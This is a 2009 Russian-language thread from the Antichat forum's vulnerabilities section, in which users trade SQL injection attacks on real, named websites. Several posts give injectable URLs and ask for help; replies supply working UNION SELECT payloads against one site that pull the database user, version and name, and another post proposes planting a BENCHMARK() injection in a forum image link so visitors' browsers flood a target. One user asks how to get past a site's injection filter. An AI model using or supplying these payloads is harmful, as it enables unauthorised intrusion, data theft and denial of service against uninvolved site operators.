ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10961  
Старый 26.12.2009, 13:50
Root-access
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440

Репутация: 648
Отправить сообщение для Root-access с помощью ICQ
По умолчанию

Цитата:
Сообщение от Strilo4ka  
На форумах есть возможность подгружать картинку с другого сайта, можно найти скуль иньекцию
потом втулить на форуме картинку, а в src
путь со скулей вбить и с функцией benchmark(),на популярном форуме (если конечно еще на src нет фильтра никакого ручными методами, тока еще все зависит от магикс_квотс на сервере где форум стоит, как обрабатываеться bb-код...)

Код:
BENCHMARK(count,expr) 
The BENCHMARK() function executes the expression expr repeatedly count times. It may be used to time how quickly MySQL processes the expression. The result value is always 0. The intended use is from within the mysql client, which reports query execution times:
При чем всегда будут ип пользователей, не твой
когда браузер будет у них интерпретировать то будет запрашывать картинку с сайта где скуль .

Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.
 
Ответить с цитированием

  #10962  
Старый 26.12.2009, 17:11
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
http://www.aghamyan.am/biography.php?form_id=2'a
nekak ne moqu nayti columns..

pojalusta pomoqite..
 
Ответить с цитированием

  #10963  
Старый 26.12.2009, 21:20
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от LokbatanLi  
nekak ne moqu nayti columns..

pojalusta pomoqite..
а я никак не могу инъекцию там найти..

мысль улавливаешь?
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #10964  
Старый 26.12.2009, 22:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от LokbatanLi  
nekak ne moqu nayti columns..

pojalusta pomoqite..

как бы там только раскрытие путей.
http://www.aghamyan.am/biography.php?form_id[]=6
 
Ответить с цитированием

  #10965  
Старый 26.12.2009, 23:51
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

может кто поможет никак не могу обходит филтрацию редирект идет ((

Цитата:
http://investorshub.advfn.com/boards/boards_moderated.asp?user=-177571'+order+by+1{
 
Ответить с цитированием

  #10966  
Старый 26.12.2009, 23:59
GinTonic
Новичок
Регистрация: 18.12.2009
Сообщений: 13
Провел на форуме:
96637

Репутация: 0
По умолчанию

http://www.worstpreviews.com/headline2.php?id=16149'
Подскажите, как раскрутить.
 
Ответить с цитированием

  #10967  
Старый 27.12.2009, 00:03
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

Цитата:
Сообщение от GinTonic  
http://www.worstpreviews.com/headline2.php?id=16149'
Подскажите, как раскрутить.
http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8
 
Ответить с цитированием

  #10968  
Старый 27.12.2009, 00:15
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

http://www.worstpreviews.com/headline2.php?id=-16149+union+select+1,unhex(hex(user())),3,4,5,6,7, 8
 
Ответить с цитированием

  #10969  
Старый 27.12.2009, 01:15
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

Цитата:
Сообщение от YuNi|[c  
может кто поможет никак не могу обходит филтрацию редирект идет ((
ну спс за ответы ((
 
Ответить с цитированием

  #10970  
Старый 27.12.2009, 12:40
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131

Репутация: 45
По умолчанию

Может не туда конечно пишу. Скажите почему не пингуется главная машина в сети (192.168.0.1). Все 40 компьютеров в сети пингуются, а сервак ни в какую. Что он сделал чтобы не пинговалось? И можно ли как нибудь это одолеть?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ